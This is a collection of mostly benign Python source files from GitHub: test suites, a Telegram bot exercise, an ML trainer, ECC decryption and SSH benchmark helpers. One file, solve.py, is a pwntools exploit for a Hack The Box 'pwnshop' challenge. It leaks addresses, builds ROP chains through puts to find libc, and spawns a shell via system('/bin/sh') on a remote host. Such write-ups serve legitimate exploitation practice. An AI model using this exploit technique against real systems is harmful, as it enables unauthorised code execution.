file=sys.stderr)\n return 1\n # offset\n elif type_cmd == \"offset\":\n name = args.type_name\n s = AmigaStructTypes.find_struct(name)\n if s is None:\n print(\"type '%s' not found!\" % name, file=sys.stderr)\n return 1\n else:\n offset = parse_scalar(int, args.type_offset)\n field_defs, delta = s.sdef.find_sub_field_defs_by_offset(offset)\n if field_defs:\n td = TypeDumper()\n td.dump_fields(*field_defs)\n return 0\n else:\n print(\"No Field found at\", offset, file=sys.stderr)\n return 1\n\n def _dump_fields(self, where, fields):\n if len(fields) == 0:\n print(\"no fields found: %s\" % where, file=sys.stderr)\n return 1\n else:\n off = 0\n for f in fields:\n total = off + f.offset\n print(\n \"@%04x +%04x = %04x (size=%04x) %s\"\n % (off, f.offset, total, f.size, f.name)\n )\n off += f.offset\n return 0\n","repo_name":"cnvogelg/amitools","sub_path":"amitools/vamos/tools/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"50"}
+{"seq_id":"33192371273","text":"import unittest\nfrom time import sleep\nfrom selenium import webdriver\nfrom parameterized import parameterized\n\nclass test_baidu(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n cls.driver = webdriver.Chrome()\n cls.base_url = \"https://www.baidu.com/\"\n\n @classmethod\n def tearDownClass(cls) -> None:\n cls.driver.quit()\n\n def baidu_search(self, search_key):\n self.driver.get(self.base_url)\n self.driver.find_element_by_css_selector(\"#kw\").send_keys(search_key)\n self.driver.find_element_by_css_selector(\"#su\").click()\n sleep(2)\n @parameterized.expand([\n (\"case1\",\"selenium\"),\n (\"case2\", \"unittest\"),\n (\"case3\", \"parameterized\")\n ])\n def test_search(self,name,key_word):\n self.baidu_search(key_word)\n self.assertEqual(self.driver.title, key_word+\"_百度搜索\")\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"UULIN/automation_test","sub_path":"unit7_unittest_expand/test_case/test_parameterized_baidu.py","file_name":"test_parameterized_baidu.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
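Note (added): in the test above, @parameterized.expand generates one independent test method per tuple, embedding the first element in the generated name. A minimal self-contained illustration of the same mechanism:

import unittest
from parameterized import parameterized

class TestUpper(unittest.TestCase):
    @parameterized.expand([
        ("ascii", "abc", "ABC"),
        ("mixed", "aBc", "ABC"),
    ])
    def test_upper(self, name, given, expected):
        # Each tuple becomes its own test case, reported separately.
        self.assertEqual(given.upper(), expected)

if __name__ == "__main__":
    unittest.main(verbosity=2)  # runs e.g. test_upper_0_ascii and test_upper_1_mixed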
+{"seq_id":"30302579506","text":"# Write a program that reads a question from a file, answers it, and sends the answer back to the user.\n\nimport telebot\n\n\nbot = telebot.TeleBot('')\n\n@bot.message_handler(commands=['answer'])\ndef send_welcome(message):\n bot.send_message(message.from_user.id,\n f'Hello {message.from_user.first_name} ')\n\n@bot.message_handler(content_types=['text'])\ndef request(message):\n text = message.text\n if text != 'ok':\n with open('appel.txt', 'r', encoding='utf-8') as file:\n request = file.read().replace('\\n', ':').split(':') \n answer = 'The weather will be sunny tomorrow'\n bot.send_message(request[0], f'You asked: {request[1]}')\n bot.send_message(request[0], f'Answer: {answer}')\n\n\nbot.polling()\n","repo_name":"madnov/Python_lessons","sub_path":"Home_work_8/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"12311795125","text":"from telemetry.page import page as page_module\nfrom telemetry import story\n\n# Even though we don't specialize page behavior directly, we have to define our\n# own page class so that |story.serving_dir| fetched from the StorySet will\n# reflect the path to our containing directory, under which we serve local files\n# for recording. See also initialization of |base_dir| in telemetry's page.Page\n# constructor, which is in turn referenced by |file_path_url|.\nclass PartialInvalidationCasesPage(page_module.Page):\n\n def __init__(self, url, page_set):\n super(PartialInvalidationCasesPage, self).__init__(\n url=url, page_set=page_set, name=url.split('/')[-1])\n\n\nclass PartialInvalidationCasesPageSet(story.StorySet):\n\n \"\"\" Page set consisting of pages specialized for partial invalidation,\n for example, pages with many elements. \"\"\"\n\n def __init__(self):\n super(PartialInvalidationCasesPageSet, self).__init__(\n cloud_storage_bucket=story.PARTNER_BUCKET)\n\n other_urls = [\n # Why: Reduced test case similar to the single page html5 spec wherein\n # we saw a performance regression demonstrable via a small partial\n # invalidation.\n 'file://partial_invalidation_cases/800_relpos_divs.html',\n ]\n\n for url in other_urls:\n self.AddStory(PartialInvalidationCasesPage(url, self))\n","repo_name":"kiwibrowser/src","sub_path":"tools/perf/page_sets/partial_invalidation_cases.py","file_name":"partial_invalidation_cases.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"}
+{"seq_id":"41921389088","text":"from fpdf import FPDF # importing FPDF for generating pdf\r\nimport os # importing os for opening of pdf directly\r\n\r\n\r\ndef pdf_file():\r\n # creating a pdf and adding a page\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font(\"Times\", size=13)\r\n\r\n # taking text file to print text in pdf (a context manager ensures the file is closed)\r\n with open(\"vahini.txt\", \"r\") as f:\r\n for x in f:\r\n pdf.cell(200, 10, txt=x, ln=1, align='L')\r\n # output pdf\r\n pdf.output(\"my.pdf\")\r\n os.system('my.pdf')\r\n\r\n","repo_name":"vahinisaisree/final","sub_path":"pds.py","file_name":"pds.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"12508939845","text":"import unittest\n\nfrom telemetry import decorators\nfrom telemetry.internal.browser import browser_options\nfrom telemetry.internal.platform import android_device\nfrom telemetry.internal.platform import remote_platform_options\nfrom telemetry.testing import system_stub\nimport mock\n\nfrom devil.android import device_utils\nfrom 
devil.android import device_blacklist\n\n\nclass _BaseAndroidDeviceTest(unittest.TestCase):\n def setUp(self):\n def check_blacklist_arg(blacklist):\n self.assertTrue(blacklist is None\n or isinstance(blacklist, device_blacklist.Blacklist))\n return mock.DEFAULT\n\n self._healthy_device_patcher = mock.patch(\n 'devil.android.device_utils.DeviceUtils.HealthyDevices')\n self._healthy_device_mock = self._healthy_device_patcher.start()\n self._healthy_device_mock.side_effect = check_blacklist_arg\n self._android_device_stub = system_stub.Override(\n android_device, ['subprocess'])\n\n def _GetMockDeviceUtils(self, device_serial):\n device = device_utils.DeviceUtils(device_serial)\n return device\n\n def tearDown(self):\n self._healthy_device_patcher.stop()\n self._android_device_stub.Restore()\n\n\nclass AndroidDeviceTest(_BaseAndroidDeviceTest):\n @decorators.Enabled('android')\n def testGetAllAttachedAndroidDevices(self):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('01'),\n self._GetMockDeviceUtils('02')]\n self.assertEquals(\n set(['01', '02']),\n set(device.device_id for device in\n android_device.AndroidDevice.GetAllConnectedDevices(None)))\n\n @decorators.Enabled('android')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testNoAdbReturnsNone(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with (\n mock.patch('os.path.isabs', return_value=True)), (\n mock.patch('os.path.exists', return_value=False)):\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNone(android_device.GetDevice(finder_options))\n\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbNoDevicesReturnsNone(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = []\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNone(android_device.GetDevice(finder_options))\n\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbTwoDevicesReturnsNone(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c'),\n self._GetMockDeviceUtils('015d14fec128220d')]\n device = android_device.GetDevice(finder_options)\n warning_mock.assert_called_with(\n 'Multiple devices attached. 
Please specify one of the following:\\n'\n ' --device=015d14fec128220c\\n'\n ' --device=015d14fec128220d')\n self.assertIsNone(device)\n\n @decorators.Enabled('android')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbPickOneDeviceReturnsDeviceInstance(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n platform_options = remote_platform_options.AndroidPlatformOptions(\n device='555d14fecddddddd') # pick one\n finder_options.remote_platform_options = platform_options\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c'),\n self._GetMockDeviceUtils('555d14fecddddddd')]\n device = android_device.GetDevice(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertEquals('555d14fecddddddd', device.device_id)\n\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n def testAdbOneDeviceReturnsDeviceInstance(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c')]\n device = android_device.GetDevice(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertEquals('015d14fec128220c', device.device_id)\n\n\nclass FindAllAvailableDevicesTest(_BaseAndroidDeviceTest):\n\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n def testAdbNoDeviceReturnsEmptyList(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = []\n devices = android_device.FindAllAvailableDevices(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNotNone(devices)\n self.assertEquals(len(devices), 0)\n\n\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n def testAdbOneDeviceReturnsListWithOneDeviceInstance(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c')]\n devices = android_device.FindAllAvailableDevices(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n self.assertIsNotNone(devices)\n self.assertEquals(len(devices), 1)\n self.assertEquals('015d14fec128220c', devices[0].device_id)\n\n\n @decorators.Disabled('all')\n @mock.patch('telemetry.internal.platform.android_device.logging.warning')\n # https://github.com/catapult-project/catapult/issues/3099 (Android)\n def testAdbMultipleDevicesReturnsListWithAllDeviceInstances(self, warning_mock):\n finder_options = browser_options.BrowserFinderOptions()\n with mock.patch('os.path.isabs', return_value=False):\n self._healthy_device_mock.return_value = [\n self._GetMockDeviceUtils('015d14fec128220c'),\n self._GetMockDeviceUtils('015d14fec128220d'),\n self._GetMockDeviceUtils('015d14fec128220e')]\n devices = android_device.FindAllAvailableDevices(finder_options)\n self.assertEquals(warning_mock.call_count, 0)\n 
self.assertIsNotNone(devices)\n self.assertEquals(len(devices), 3)\n self.assertEquals(devices[0].guid, '015d14fec128220c')\n self.assertEquals(devices[1].guid, '015d14fec128220d')\n self.assertEquals(devices[2].guid, '015d14fec128220e')\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/telemetry/telemetry/internal/platform/android_device_unittest.py","file_name":"android_device_unittest.py","file_ext":"py","file_size_in_byte":7221,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"}
+{"seq_id":"2776242778","text":"import json\nimport csv\nimport yaml\n\n\nclass DictionaryList:\n\n def __init__(self):\n self._items = []\n\n def __next_id(self):\n if not self._items:\n return 1\n else:\n return max([item[\"id\"] for item in self._items]) + 1\n\n def append(self, **item):\n\n item[\"id\"] = self.__next_id()\n self._items.append(item)\n return self\n\n def to_console(self):\n\n for item in self._items:\n for key in sorted(item):\n print(f\"{key}: {item[key]}\")\n\n\nclass JsonOutputMixin:\n\n def to_json(self):\n return json.dumps(self._items)\n\n\nclass CsvOutputMixin:\n\n def to_csv(self, csv_file_name):\n\n with open(csv_file_name, \"w\", newline=\"\") as csv_file:\n csv_writer = csv.DictWriter(csv_file, self._items[0])\n csv_writer.writeheader()\n for item in self._items:\n csv_writer.writerow(item)\n\n\nclass YamlOutputMixin:\n\n def to_yaml(self):\n return yaml.dump(self._items)\n\n\nclass ColorList(DictionaryList, JsonOutputMixin, CsvOutputMixin,\n YamlOutputMixin):\n\n def append(self, color_name, color_hexcode):\n super().append(name=color_name, hexcode=color_hexcode)\n\n\ndef main():\n\n colors = ColorList()\n colors.append(\"red\", \"ff0000\")\n colors.append(\"green\", \"00ff00\")\n colors.append(\"blue\", \"0000ff\")\n\n colors.to_console()\n\n print(colors.to_json())\n\n colors.to_csv(\"colors.csv\")\n\n print(colors.to_yaml())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"craigmckeachie/python_demos","sub_path":"object-oriented-part2/mixin.py","file_name":"mixin.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
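Note (added): the mixin classes above carry no state of their own; they only read the `self._items` list provided by DictionaryList. Python's C3 linearization makes the lookup order explicit; assuming the file is saved as mixin.py:

from mixin import ColorList  # hypothetical import

print([cls.__name__ for cls in ColorList.__mro__])
# -> ['ColorList', 'DictionaryList', 'JsonOutputMixin', 'CsvOutputMixin',
#     'YamlOutputMixin', 'object']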
+{"seq_id":"23642709967","text":"from torch.utils.data import Dataset, Subset\nimport glob\nimport cv2 as cv\nimport numpy as np\n\n\nclass DatasetTiles(Dataset):\n r\"\"\"\n Class to load the dataset of a specific defect.\n \"\"\"\n\n def __init__(self, parent_dir, defect, width=256, height=256):\n r\"\"\"\n Load the dataset.\n :param parent_dir: root folder.\n :param defect: directory of the defect.\n\n Image format:\n - .jpg: image\n - .png: binary mask\n \"\"\"\n self.img_list_path = glob.glob(parent_dir + '/' + defect + '/Imgs/*.jpg')\n self.img_mask_list_path = glob.glob(parent_dir + '/' + defect + '/Imgs/*.png')\n\n self.width = width\n self.height = height\n\n print(f\"{defect} loaded!\")\n\n def __getitem__(self, index):\n r\"\"\"\n Get the image and its mask.\n :param index: index of the specific image\n \"\"\"\n\n x = self.preprocessing(self.img_list_path[index], False)\n # Reorder axes from [height, width, n_channels] to [n_channels, height, width]\n x = np.rollaxis(x, 2, 0)\n\n y = self.preprocessing(self.img_mask_list_path[index], True)\n # Add a leading channel axis: [height, width] -> [1, height, width]\n y = np.expand_dims(y, axis=0)\n\n return x, y\n\n def preprocessing(self, img, convert_to_gray):\n r\"\"\"\n Performs a preprocessing on the image.\n :param img: img to be processed\n :param convert_to_gray: true if the conversion is grayscale, false otherwise.\n \"\"\"\n\n img = cv.imread(img)\n img = cv.resize(img, (self.width, self.height))\n\n if convert_to_gray:\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n else:\n img = cv.cvtColor(img, cv.COLOR_RGB2BGR)\n\n img = img / 255\n img = img.astype(np.float32)\n\n return img\n\n def __len__(self):\n return len(self.img_list_path)\n\n\ndef train_test_split(dataset):\n r\"\"\"\n Split dataset into training, validation and test sets:\n - 70% training set;\n - 20% validation set;\n - 10% test set.\n\n :param dataset: dataset to split\n :return : training, validation and test set.\n \"\"\"\n length_dataset = len(dataset)\n\n length_train = np.int_(length_dataset * 0.7)\n length_validate = np.int_(length_dataset * 0.2)\n\n training_dataset = Subset(dataset, range(0, length_train))\n validation_dataset = Subset(dataset, range(length_train, length_train + length_validate))\n test_dataset = Subset(dataset, range(length_train + length_validate, len(dataset)))\n\n return training_dataset, validation_dataset, test_dataset\n","repo_name":"lollopagno/DefectTiles","sub_path":"UNet/DatasetTiles/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"29398354924","text":"# import all functions from the ecc_func.py\nfrom ecc_func import *\n\n\n# ElGamal decryption\ndef decryption(C1, C2, d, p, a, b):\n\n # Compute the plaintext M = C2 - dC1\n dC1 = ec_mult(d, C1, p, a, b)\n dC1 = Point(dC1.x, -dC1.y % p)\n M = ec_add(C2, dC1, p, a, b)\n\n # The plaintext M can be sent to the recipient\n return M\n\n\n# main program\nif __name__ == '__main__':\n print(\"Curve E: y^2 = x^3 + ax + b (mod p)\")\n\n # get the curve parameters\n p = 7559\n a = 0\n b = 7\n\n # get generator G\n G = Point(12, 217)\n\n # get the message M as a point on the curve\n M = Point(3085, 2919)\n\n # get the ciphertext\n C1, C2 = get_ciphertext()\n\n # get the private key\n d = get_private_key()\n\n # decrypt the ciphertext\n P = decryption(C1, C2, d, p, a, b)\n\n # print the plaintext\n print(f'Plaintext: ({P.x}, {P.y})')\n\n # The plaintext P = (3085, 2919) is the original message\n","repo_name":"kn-vardhan/Elliptic-Curve-Cryptography","sub_path":"Codes/elgamal-decrypt.py","file_name":"elgamal-decrypt.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"38223378656","text":"import logging\nfrom dataclasses import dataclass\nfrom typing import Tuple\n\nimport cgan\nimport dataset\nimport numpy as np\nimport opacus\nimport torch\nfrom sklearn import metrics\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import LabelBinarizer\nfrom utils import setup_logging\n\nlogger = logging.getLogger(__name__)\nsetup_logging(print_level=\"INFO\", logger=logger)\n\n\n@dataclass\nclass Trainer:\n \"\"\"A trainer for CGAN with differential privacy\"\"\"\n\n generator: cgan.Generator\n optimizerG: torch.optim\n discriminator: cgan.Discriminator\n optimizerD: torch.optim\n criterion: torch.nn.modules.loss\n #privacy_engine: opacus.privacy_engine.PrivacyEngine\n train_loader: 
torch.utils.data.dataloader.DataLoader\n    test_dataset: dataset.TabularDataset\n    target_epsilon: float\n    target_delta: float\n    device: str\n    epochs: int\n    latent_dim: int\n    fixed_noise: torch.Tensor\n    fixed_labels: np.ndarray\n    exp_dir: str\n    eval_period: int\n\n    def __post_init__(self):\n        self.n_classes = self.test_dataset.num_classes()\n\n    def train(self) -> Tuple[list, list]:\n        \"\"\"Trains the CGAN model with differential privacy\n\n        Returns:\n            A tuple containing lists of evaluation metrics: AUC and average\n            precision\n        \"\"\"\n\n        iteration = 0\n        best_auc = 0\n        budget = True\n        mlp_aucs = []\n        mlp_aps = []\n\n        for epoch in range(self.epochs):\n\n            #if not budget:\n            #    logger.info(\n            #        \"Privacy budget exceeded! Iteration = %d, ε = %.3f\"\n            #        % (iteration, epsilon)  # noqa: F821\n            #    )\n            #    break\n\n            for _, data in enumerate(self.train_loader):\n\n                real_data = data[0].type(torch.FloatTensor).to(self.device)\n                real_labels = data[1].to(self.device)\n                batch_size = real_data.size(0)\n\n                label_fake = torch.full(\n                    (batch_size, 1), 0.0, device=self.device\n                )\n                label_true = torch.full(\n                    (batch_size, 1), 1.0, device=self.device\n                )\n\n                ######################\n                # (1) Update D network\n                ######################\n                self.optimizerD.zero_grad()\n\n                # train with fake data\n                noise = torch.randn(\n                    batch_size, self.latent_dim, device=self.device\n                )\n                gen_labels = torch.randint(\n                    0, self.n_classes, (batch_size,), device=self.device\n                )\n\n                fake = self.generator(noise, gen_labels)\n\n                output = self.discriminator(fake.detach(), gen_labels)\n                errD_fake = self.criterion(output, label_fake)\n                errD_fake.backward()\n                self.optimizerD.step()\n                self.optimizerD.zero_grad()\n\n                # train with real data\n                output = self.discriminator(real_data, real_labels)\n                errD_real = self.criterion(output, label_true)\n                errD_real.backward()\n                self.optimizerD.step()\n\n                errD = errD_real + errD_fake\n\n                ######################\n                # (2) Update G network\n                ######################\n                self.optimizerG.zero_grad()\n                self.optimizerD.zero_grad()\n\n                output_g = self.discriminator(fake, gen_labels)\n                errG = self.criterion(output_g, label_true)\n                errG.backward()\n\n                self.optimizerG.step()\n\n                #\n                #(\n                #    epsilon,\n                #    best_alpha,\n                #) = self.privacy_engine.accountant.get_privacy_spent(\n                #    delta=self.target_delta\n                #)\n\n                #if epsilon > self.target_epsilon:\n                #    budget = False\n                #    break\n\n                iteration = iteration + 1\n                if iteration % self.eval_period == 0:\n\n                    logger.info(\n                        \"Iteration = %d, Loss_D = %.2f, Loss_G = %.2f\"\n                        % (iteration, errD.item(), errG.item())\n                    )\n                    #logger.info(\n                    #    \"(ε = %.3f, δ = %.2f) for α = %.2f\"\n                    #    % (epsilon, self.target_delta, best_alpha)\n                    #)\n                    mlp_auc, mlp_ap = self._eval()\n                    mlp_aucs.append(mlp_auc)\n                    mlp_aps.append(mlp_ap)\n                    logger.info(\n                        \"mlp_auc = %.3f, mlp_ap = %.3f\" % (mlp_auc, mlp_ap)\n                    )\n                    if mlp_auc > best_auc:\n                        best_auc = mlp_auc\n                        logger.info(\n                            f\"Checkpoint saved at iteration={iteration} \"\n                            # f\"eps={epsilon:.3f}\"\n                        )\n                        torch.save(\n                            {\n                                \"discriminator\": (\n                                    self.discriminator.state_dict()\n                                ),\n                                \"generator\": self.generator.state_dict(),\n                                #\"accountant\": self.privacy_engine.accountant,\n                                \"optimizerG\": self.optimizerG.state_dict(),\n                                \"optimizerD\": self.optimizerD.state_dict(),\n                            },\n                            f\"{self.exp_dir}/checkpoint_{iteration}.pth\"\n                            #f\"{epsilon:.3f}.pth\",\n                        )\n\n        return mlp_aucs, mlp_aps\n\n    def _eval(self) -> Tuple[float, float]:\n        \"\"\"Evaluates the model by applying an MLP classifier\n\n        Returns:\n            A tuple containing the classifier AUC and average precision\n        \"\"\"\n        fake_features, fake_labels 
= self._generate_fake_data()\n mlp = MLPClassifier(early_stopping=True).fit(\n fake_features, fake_labels\n )\n class_probs = mlp.predict_proba(self.test_dataset.features)\n auc = metrics.roc_auc_score(\n self.test_dataset.labels,\n class_probs,\n average=\"weighted\",\n multi_class=\"ovo\",\n )\n\n if self.n_classes > 2:\n lb = LabelBinarizer()\n lb.fit(self.test_dataset.labels)\n y_test = lb.transform(self.test_dataset.labels)\n else:\n y_test = self.test_dataset.labels\n\n ap = metrics.average_precision_score(y_test, class_probs)\n return auc, ap\n\n def _generate_fake_data(self) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"generates fake dataset using the DP-CGAN generator\n\n Returns:\n A tuple of generted features and their corresponding labels\n \"\"\"\n fixed_labels = torch.from_numpy(self.fixed_labels).to(self.device)\n fake_features = self.generator(self.fixed_noise, fixed_labels).detach()\n fake_features = fake_features.cpu().numpy()\n return fake_features, self.fixed_labels\n","repo_name":"Ilnazad/vector_institute","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27677911716","text":"import paramiko\nimport itertools\n\n\ndef GenProduct(config):\n keys, values = zip(*config.items())\n permutations_config = [dict(zip(keys, v))\n for v in itertools.product(*values)]\n return permutations_config\n\n\ndef GenBinding(config_list):\n r = []\n for each in config_list:\n r += GenProduct(each)\n return r\n\n\ndef RemoteExecute(server, command, path, print_show=True):\n import re\n print_command = re.sub(r' +', ' ', command)\n # print_command = command.replace('\\t', ' ')\n if print_show:\n print(f\"==={server}=== {print_command}\")\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(server)\n\n if path == '':\n stdin, stdout, stderr = client.exec_command(\n command,)\n else:\n stdin, stdout, stderr = client.exec_command(\n f'cd {path}; {command}',)\n\n stdout_iter = iter(stdout.readline, '')\n stderr_iter = iter(stderr.readline, '')\n\n from itertools import zip_longest\n\n for out, err in zip_longest(stdout_iter, stderr_iter):\n if out:\n if print_show:\n print(out.strip())\n if err:\n if print_show:\n print(err.strip())\n\n # for line in stdout:\n # print(line, end='')\n client.close()\n return stdout.channel.recv_exit_status()\n\n\ndef Pnuke(servers, pattern):\n print(f\"==={servers}=== Pnuke {pattern}\")\n if type(servers) is not list:\n servers = [servers]\n import subprocess\n import concurrent.futures\n\n def command_fn(host):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(host)\n ret = 0\n while ret == 0:\n command = f\"ps aux |grep {pattern}| grep -v grep | awk '{{print $2}}' | xargs kill -9\"\n stdin, stdout, stderr = client.exec_command(\n command\n )\n ret = stdout.channel.recv_exit_status()\n client.close()\n with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:\n for each in servers:\n executor.submit(command_fn, each)\n\n\ndef disjoint_dicts_to_one_dict(dicts):\n a = dicts[0].copy()\n for i in range(1, len(dicts)):\n a.update(dicts[i])\n return a\n\n\ndef StringnizeConfig(config):\n for each_k in config.keys():\n config[each_k] = [str(each) for each in config[each_k]]\n\n\ndef PreprocessConfig(config):\n # StringnizeConfig(config)\n if 'binding' in config:\n config_binding = 
config['binding']\n        del config['binding']\n        permutations_binding_config = GenBinding(config_binding)\n        permutations_config = GenProduct(config)\n        permutations_config = itertools.product(\n            permutations_config, permutations_binding_config, )\n\n        # [(dictA, dictB), (dictA, dictB), (dictA, dictB),]\n        permutations_config = [disjoint_dicts_to_one_dict(each)\n                               for each in permutations_config]\n        return permutations_config\n    else:\n        return GenProduct(config)\n","repo_name":"thustorage/PetPS","sub_path":"benchmark/bench_util.py","file_name":"bench_util.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"}
+{"seq_id":"33036566570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 09 15:16:42 2017\n\n@author: ralall\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom numpy import log\n\ndef func(x, a, b, c):\n    return a * log(b * x) + c\n\nx = np.array([0, 1.1029, 1.6148])\ny = np.array([-8.5067, -6.8924, -6.713])\n\npopt, pcov = curve_fit(func, x, y)\n\nplt.figure()\nplt.plot(x, y, 'k.', label = 'Raw Data')\nplt.plot(x, func(x, *popt), 'k-', label = 'Fitted Curve')\nplt.xlabel('ln(x)')\nplt.ylabel('y')\nplt.legend()\nplt.show()","repo_name":"Nimitkothari/Analytics","sub_path":"Python-anlytics/testnon.py","file_name":"testnon.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"42285760166","text":"#!/usr/bin/env python\n\n\nfrom pwn import *\n\nBINARY = \"./pwnshop\"\nLIBC = \"./libc.so.6\"\nADDR = \"138.68.148.149\"\nPORT = 30975\n\nsplash()\nelf = context.binary = ELF(BINARY)\nlibc = ELF(LIBC, checksec=False)\n\n\nclass Offsets:\n    fake_frame_offset = 0x40C0\n    buy_offset = 0x132A\n\n\nclass Gadgets:\n    sub_rsp_0x28_ret = 0x1219\n    pop_rdi_ret = 0x13C3\n\n\ndef conn():\n    if args.LOCAL:\n        pty = process.PTY\n        return process(elf.path, stdin=pty, stdout=pty, stderr=pty)\n\n    else:\n        return remote(ADDR, PORT)\n\n\ndef solve():\n    io = conn()\n\n    io.sendlineafter(\"> \", \"2\")\n    io.sendlineafter(\"What do you wish to sell? \", \"\")\n    io.sendlineafter(\"How much do you want for it? \", cyclic(0x7, n=8))\n    io.recvuntil(\"? 
\")\n elf_leak = io.recvuntil(\"?\")[:-1]\n elf_leak = u64(elf_leak[8:].ljust(8, b\"\\x00\"))\n elf.address = elf_leak - Offsets.fake_frame_offset\n log.success(f\"elf base address found: {hex(elf.address)}\")\n log.success(f\"fake frame found @: {hex(elf_leak)}\")\n\n payload = [\n cyclic(40, n=8),\n elf.address + Gadgets.pop_rdi_ret,\n elf.got.puts,\n elf.plt.puts,\n elf.address + Offsets.buy_offset,\n elf.address + Gadgets.sub_rsp_0x28_ret,\n ]\n io.sendlineafter(\"> \", \"1\")\n io.sendafter(\"Enter details: \", flat(payload))\n puts_leak = io.recvuntil(\"\\n\")[:-1]\n puts_leak = u64(puts_leak.ljust(8, b\"\\x00\"))\n libc.address = puts_leak - libc.sym.puts\n bin_sh = next(libc.search(b\"/bin/sh\\x00\"))\n log.success(f\"puts@got found @: {hex(puts_leak)}\")\n log.success(f\"libc base address found @: {hex(libc.address)}\")\n log.success(f\"/bin/sh string found @: {hex(bin_sh)}\")\n\n payload = [\n cyclic(40, n=8),\n elf.address + Gadgets.pop_rdi_ret,\n bin_sh,\n libc.sym.system,\n libc.sym.exit,\n elf.address + Gadgets.sub_rsp_0x28_ret,\n ]\n io.sendafter(\"Enter details: \", flat(payload))\n\n io.interactive()\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"one2blame/ctf","sub_path":"htb/pwnshop/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73226464166","text":"from oslo_config import cfg\nfrom oslo_log import log as logging\nfrom pecan import expose as pecan_expose\nfrom pecan import request as pecan_request\nfrom wsme import types as wtypes\nfrom wsmeext import pecan as wsme_pecan\n\nfrom octavia_proxy.api.common.invocation import driver_invocation\nfrom 